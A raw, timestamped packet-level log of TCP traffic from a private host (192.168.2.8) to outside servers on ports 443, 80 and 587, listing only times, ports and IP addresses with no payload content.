Sep 2, 2024 07:48:36.564522028 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.564606905 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.564619064 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.568109035 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.571261883 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.571278095 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.571358919 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.571369886 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.572081089 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.589688063 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.589709044 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.589792013 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.589802980 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.589886904 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.606184006 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.606240034 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.606295109 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.606303930 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.606338978 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.606358051 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.611501932 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.611517906 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.611572027 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.611581087 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.612168074 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.622363091 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.622381926 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.622426987 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.622436047 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.622457981 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.622471094 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.630753040 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.630769014 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.630831003 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.630841970 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.630985975 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.637692928 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.637710094 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.637761116 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.637772083 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.638053894 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.652055979 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.652070999 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.652187109 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.652205944 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.655507088 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.658893108 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.658916950 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.658958912 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.658967972 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.658994913 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.659008980 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.689820051 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.689836979 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.689973116 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.689992905 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.690041065 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.695208073 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.695226908 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.695290089 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.695302010 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.696074963 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.701668024 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.701687098 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.701728106 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.701746941 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.701759100 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.701786995 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.711430073 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.711447954 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.711498976 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.711509943 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.711536884 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.711544991 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.719455957 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.719472885 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.719532967 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.719542980 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.720089912 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.726094961 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.726111889 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.726197958 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.726208925 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.728266954 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.740652084 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.740673065 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.740721941 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.740732908 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.740758896 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.740777969 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.747416019 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.747431993 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.747472048 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.747483015 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.747512102 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.747523069 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.778309107 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.778326035 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.778412104 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.778426886 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.778459072 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.783495903 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.783515930 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.783595085 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.783615112 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.784142971 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.790539026 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.790555954 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.790656090 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.790673018 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.792113066 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.799190044 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.799206972 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.799268007 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.799283981 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.800070047 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.808228016 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.808245897 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.808329105 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.808340073 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.809789896 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.814517975 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.814536095 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.814606905 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.814619064 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.816421986 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.829516888 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.829539061 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.829617977 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.829627991 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.830133915 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.837310076 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.837325096 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.837382078 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.837393045 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.837467909 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.866921902 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.866944075 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.867019892 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.867033005 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.867168903 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.871974945 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.871992111 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.872050047 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.872059107 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.872114897 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.878422022 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.878442049 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.878506899 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.878516912 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.878624916 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.888319016 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.888335943 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.888395071 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.888403893 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.888472080 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.896579027 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.896600008 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.896656036 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.896666050 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.896744013 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.900774956 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.900837898 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.900846004 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.900861025 CEST	443	49711	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:36.900907993 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:36.901384115 CEST	49711	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:38.118716955 CEST	49712	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:38.124140024 CEST	80	49712	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:38.124238014 CEST	49712	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:38.124459982 CEST	49712	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:38.129396915 CEST	80	49712	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:38.572321892 CEST	80	49712	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:38.624924898 CEST	49712	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:40.639512062 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:40.650528908 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:40.650607109 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:41.147948027 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:41.147993088 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:41.148063898 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:41.151030064 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:41.151052952 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:41.298819065 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.299866915 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:41.307986021 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.442658901 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:41.442888975 CEST	49709	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:41.449321985 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.449620008 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:41.454638004 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.598928928 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.604314089 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:41.609256029 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.762269020 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.762290001 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.762300968 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.762314081 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.762414932 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:41.781744003 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:41.786880016 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.931756020 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:41.999922037 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:42.014764071 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.014873981 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.094371080 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.094408989 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.094670057 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.156186104 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.420542002 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.428473949 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:42.433626890 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:42.464513063 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.578068018 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:42.584135056 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:42.589809895 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:42.670463085 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.732255936 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:42.732594967 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:42.738542080 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:42.765537024 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.835277081 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.835295916 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.835318089 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.835324049 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.835346937 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.835350037 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.835366964 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.835385084 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.835392952 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.835412979 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.880405903 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.880417109 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.880450010 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.880461931 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.880486012 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.880500078 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:42.880513906 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.880536079 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:42.881195068 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:42.881464958 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:42.887777090 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.002430916 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.002441883 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.002473116 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.002505064 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.002527952 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.002554893 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.002571106 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.029510021 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.029731989 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:43.034476042 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.034492970 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.034524918 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.034567118 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.034574986 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.034698963 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.034895897 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.064924002 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.064940929 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.065025091 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.065051079 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.065119028 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.095168114 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.095185995 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.095247984 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.095272064 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.095340014 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.166992903 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.167011023 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.167085886 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.167104959 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.167212009 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.192989111 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.193006039 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.193070889 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.193082094 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.193121910 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.210052967 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.210072041 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.210139036 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.210153103 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.210175037 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.210200071 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.222299099 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.222315073 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.222379923 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.222390890 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.222445011 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.237772942 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.237790108 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.237847090 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.237857103 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.237890959 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.249838114 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.249855042 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.249942064 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.249950886 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.249993086 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.263659000 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.263681889 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.263735056 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.263746023 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.263784885 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.263808966 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.290144920 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.290359974 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:43.296022892 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.320251942 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.320270061 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.320348024 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.320360899 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.320424080 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.333767891 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.333785057 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.333825111 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.333832979 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.333867073 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.333889008 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.342696905 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.342714071 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.342767954 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.342777014 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.342814922 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.351813078 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.351830959 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.351877928 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.351891041 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.351948023 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.360163927 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.360181093 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.360244036 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.360251904 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.360270023 CEST	49714	443	192.168.2.8	5.144.130.41
